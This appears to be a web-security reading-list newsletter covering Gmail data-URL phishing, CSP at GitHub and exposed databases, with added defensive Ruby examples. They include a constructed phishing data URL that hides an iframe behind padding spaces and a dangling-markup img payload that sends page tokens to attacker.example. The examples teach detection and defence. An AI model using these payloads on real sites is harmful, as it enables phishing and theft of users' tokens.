Web application and Rails security reading list #21

This one, "… is the closest I've ever come to falling for a Gmail phishing attack", describes a really clever attack. An embedded image that looks like an attachment sends you to a data:text/html address. The first part of that address is a plausible-looking Google URL; only after a long run of spaces, which pushes the rest out of view in the address bar, does it actually load the phishing site in an iframe. A lot to watch out for in 2017. Including this:
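To make the trick concrete, here is an added Ruby example (not from the linked article or this newsletter) that parses a data: URL the way RFC 2397 describes it and separates the decoy text at the front from the markup hidden behind the padding. The sample URL is constructed for the example, and the hostname phishing.example and the 400-space padding are assumptions, not values from the real attack.

```ruby
require "base64"

# Constructed sample modelled on the attack: a data:text/html address whose payload
# starts with a decoy Google-looking URL, followed by a long run of spaces, followed
# by the markup that actually renders. phishing.example is a placeholder host.
DECOY_PREFIX = "https://accounts.google.com/ServiceLogin?service=mail"
HIDDEN_MARKUP = "<iframe src=\"https://phishing.example/login\" " \
                "style=\"border:0;width:100%;height:100%\"></iframe>"
SAMPLE_DATA_URL = "data:text/html," + DECOY_PREFIX + (" " * 400) + HIDDEN_MARKUP

# Percent-decode without treating "+" as a space (data: URLs are not form data).
def percent_decode(text)
  text.b.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }.force_encoding(Encoding::UTF_8)
end

# Split a data: URL into media type and decoded payload, handling ";base64".
# An empty media type defaults to text/plain as per RFC 2397.
def parse_data_url(url)
  raise ArgumentError, "not a data: URL" unless url.start_with?("data:")
  header, body = url[5..].split(",", 2)
  raise ArgumentError, "malformed data: URL" if body.nil?
  params = header.split(";")
  media_type = params.shift.to_s
  media_type = "text/plain" if media_type.empty?
  base64 = !params.delete("base64").nil?
  payload = base64 ? Base64.decode64(body) : percent_decode(body)
  { media_type: media_type, base64: base64, payload: payload }
end

# Contrast what the address bar shows (the decoy text before the first tag)
# with what the page actually renders (everything from the first tag on).
# Returns nil for non-HTML data: URLs, which cannot load an iframe.
def inspect_html_data_url(url)
  parsed = parse_data_url(url)
  return nil unless parsed[:media_type].casecmp?("text/html")
  payload = parsed[:payload]
  tag_start = payload.index("<")
  decoy = tag_start ? payload[0...tag_start] : payload
  hidden = tag_start ? payload[tag_start..] : ""
  padding = decoy.length - decoy.rstrip.length
  {
    decoy: decoy.rstrip,
    padding: padding,
    hidden_markup: hidden,
    # External resources the hidden markup pulls in (src attributes).
    remote_sources: hidden.scan(/src=["']?([^"'\s>]+)/).flatten,
    # Heuristic, assumed for this example: URL-looking decoy text, a lot of
    # whitespace, then real markup is the signature of this disguise.
    suspicious: decoy.rstrip.match?(%r{\Ahttps?://}) && padding > 20 && !hidden.empty?,
  }
end

if $PROGRAM_NAME == __FILE__
  report = inspect_html_data_url(SAMPLE_DATA_URL)
  puts "address bar shows: data:text/html,#{report[:decoy]} (+#{report[:padding]} spaces)"
  puts "page actually loads: #{report[:remote_sources].join(', ')}"
  puts "suspicious: #{report[:suspicious]}"
end
```

The same parser also tells you that a base64-encoded data:text/html address hides its contents entirely, so a mail filter has to decode before it can judge what the link renders.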

A short story about how encryption can go very wrong with a (Ruby) workflow we’re all guilty of using.



The ongoing Content-Security-Policy journey at GitHub.

This time focusing on images and dangling markup. That's when an attacker injects an <img> tag whose src attribute is opened but never closed, so the HTML that follows the injection point, up to the next matching quote, becomes part of the image URL and is sent to the attacker's server, hidden form tokens and all.
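An added Ruby example (not GitHub's code, nor from this newsletter) that simulates the leak on a constructed page and then checks an img-src policy against the exfiltration URL. The page template, the placeholder host attacker.example and the sample token are constructed for the example, and the CSP matcher is a simplified model of the spec's source matching (no port or path matching), not a full implementation.

```ruby
require "erb"

# Constructed sample page: a comment is reflected into the HTML, and a hidden
# CSRF token plus the user's e-mail follow it in the document.
TEMPLATE = <<~HTML
  <html><body>
  <p class="comment">%{comment}</p>
  <form action="/settings" method="post">
    <input type="hidden" name="authenticity_token" value="Zk9sdGVzdHRva2Vu">
    <input type="email" name="email" value="victim@example.com">
  </form>
  </body></html>
HTML

# The dangling payload: an <img> whose single-quoted src is never closed.
PAYLOAD = "<img src='https://attacker.example/leak?"

def render_page(comment)
  format(TEMPLATE, comment: comment)
end

# Model how an HTML parser ends a single-quoted attribute: it consumes everything,
# newlines included, up to the next single quote (or end of document).
# Returns the URL the browser would request for the image.
def leaked_image_url(html)
  start = html.index("<img src='")
  return nil unless start
  value_start = start + "<img src='".length
  value_end = html.index("'", value_start) || html.length
  html[value_start...value_end]
end

# Scheme and host of a URL, tolerant of the junk a dangling attribute captures.
def url_origin_parts(url)
  m = url.match(%r{\A([a-z][a-z0-9+.-]*):(?://([^/?#:]*))?}i)
  return [nil, nil] unless m
  [m[1].downcase, m[2]&.downcase]
end

# Simplified img-src evaluator: 'self', 'none', scheme sources ("data:"),
# host sources with optional scheme and a leading "*." wildcard.
# Falls back to default-src when img-src is absent.
def csp_allows_image?(policy, image_url, page_origin)
  directives = policy.split(";").map { |d| d.strip.split(/\s+/) }.reject(&:empty?)
  name, *sources = directives.find { |d| d.first == "img-src" } ||
                   directives.find { |d| d.first == "default-src" }
  return true if name.nil? # neither directive present: CSP does not restrict images
  scheme, host = url_origin_parts(image_url)
  page_scheme, page_host = url_origin_parts(page_origin)
  sources.any? do |src|
    case src
    when "'none'" then false
    when "'self'" then scheme == page_scheme && host == page_host
    when /\A([a-z][a-z0-9+.-]*):\z/i then scheme == $1.downcase
    else
      src_scheme, src_host = src.include?("://") ? url_origin_parts(src) : [nil, src.downcase]
      next false if src_scheme && src_scheme != scheme
      src_host.start_with?("*.") ? host.to_s.end_with?(src_host[1..]) : host == src_host
    end
  end
end

if $PROGRAM_NAME == __FILE__
  leaked = leaked_image_url(render_page(PAYLOAD))
  puts "browser requests: #{leaked.inspect}"
  policy = "default-src 'self'; img-src 'self' https://assets.example.com"
  puts "allowed under #{policy}: #{csp_allows_image?(policy, leaked, 'https://app.example.com')}"
  puts "after html_escape: #{leaked_image_url(render_page(ERB::Util.html_escape(PAYLOAD))).inspect}"
end
```

Escaping the reflected comment removes the injection entirely; the img-src restriction is the second layer for the case where some injection slips through, which is exactly why it earns a place in the policy.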


A new two-factor authentication lockout recovery process at GitHub: using Facebook.


The share of HTTPS traffic seen by Firefox is now over 50% for the first time.


Chrome and Firefox 51 now show "Not Secure" warnings on plain-HTTP pages that contain password or credit card input fields.


Mozilla's coding and security checklist for their services.


Ransom attacks turn to the data stores behind web apps: check that your MongoDB, Elasticsearch, Redis, Cassandra and Hadoop instances are not reachable from the internet without authentication.
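A quick way to start that check on a Linux host is to look at what is listening on the stock ports of those stores and on which interface. The following is an added Ruby example, not from the linked articles or this newsletter; it runs over constructed `ss -ltn` output embedded below, and the port-to-service table uses the products' default ports as assumed here (adjust it to your deployment).

```ruby
# Default listening ports of the data stores named above (assumed stock defaults).
DATA_STORE_PORTS = {
  27017 => "MongoDB",
  9200  => "Elasticsearch HTTP",
  9300  => "Elasticsearch transport",
  6379  => "Redis",
  9042  => "Cassandra CQL",
  7199  => "Cassandra JMX",
  8020  => "Hadoop HDFS NameNode",
  50070 => "Hadoop HDFS NameNode web UI",
}.freeze

# Constructed sample of `ss -ltn` output. MongoDB and PostgreSQL are bound to
# loopback; Redis and Elasticsearch to all interfaces; Cassandra to one NIC.
SAMPLE_SS_OUTPUT = <<~TEXT
  State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
  LISTEN  0       128     127.0.0.1:27017      0.0.0.0:*
  LISTEN  0       128     0.0.0.0:6379         0.0.0.0:*
  LISTEN  0       128     *:9200               *:*
  LISTEN  0       128     [::]:9300            [::]:*
  LISTEN  0       128     127.0.0.1:5432       0.0.0.0:*
  LISTEN  0       128     10.0.0.5:9042        0.0.0.0:*
TEXT

LOOPBACK = ["127.0.0.1", "::1", "[::1]"].freeze
WILDCARD = ["0.0.0.0", "*", "[::]", "::"].freeze

# Split an ss "Local Address:Port" field into [address, port]; handles bracketed
# IPv6 addresses and the "*" wildcard. The port is nil for "*".
def parse_local_address(field)
  m = field.match(/\A(.*):(\d+|\*)\z/)
  return nil unless m
  [m[1], m[2] == "*" ? nil : m[2].to_i]
end

# Return the data-store listeners that are reachable from beyond localhost,
# flagging the ones bound to every interface.
def exposed_data_stores(ss_output)
  ss_output.each_line.filter_map do |line|
    cols = line.split
    next unless cols[0] == "LISTEN"
    addr, port = parse_local_address(cols[3].to_s)
    next unless port && DATA_STORE_PORTS.key?(port)
    next if LOOPBACK.include?(addr)
    { service: DATA_STORE_PORTS[port], address: addr, port: port,
      all_interfaces: WILDCARD.include?(addr) }
  end
end

if $PROGRAM_NAME == __FILE__
  # On a real host: exposed_data_stores(`ss -ltn`)
  exposed_data_stores(SAMPLE_SS_OUTPUT).each do |hit|
    scope = hit[:all_interfaces] ? "ALL INTERFACES" : hit[:address]
    puts format("%-28s port %-6d bound to %s", hit[:service], hit[:port], scope)
  end
end
```

A listener on a non-loopback address is not automatically a problem if a firewall or security group sits in front of it and the service requires authentication, but every hit on this list is worth verifying by hand: bind the service to loopback or a private interface, and turn on authentication where it is off by default (Redis' requirepass, MongoDB's security.authorization setting).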
